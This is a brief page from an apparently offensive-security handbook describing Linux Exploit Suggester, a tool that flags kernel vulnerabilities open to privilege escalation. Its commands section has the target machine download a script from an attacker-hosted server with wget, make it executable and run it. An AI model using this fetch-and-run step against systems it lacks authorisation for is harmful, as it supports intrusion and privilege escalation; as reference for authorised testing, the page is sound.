handbook/tools/5.Machine/1.Linux/General/Tools/Linux Exploitation Suggester.md
2024-08-31 01:07:22 +02:00

636 B

General

Linux Exploitation Suggester (LES) is a tool that checks the operating system (OS) and version of a machine and suggests potential kernel vulnerabilities that could be exploited. LES is typically used by security professionals to assess the security of a system and identify weaknesses that need to be addressed.

Commands

# Attacking Machine
python3 -m http.server

# Target Machine
wget http://IP/Name.sh
chmod +x NAME.sh
./NAME.sh
  • Check for exposure (Probability of success)

Linux Exploit Suggester

All Information ---> https://github.com/mzet-/linux-exploit-suggester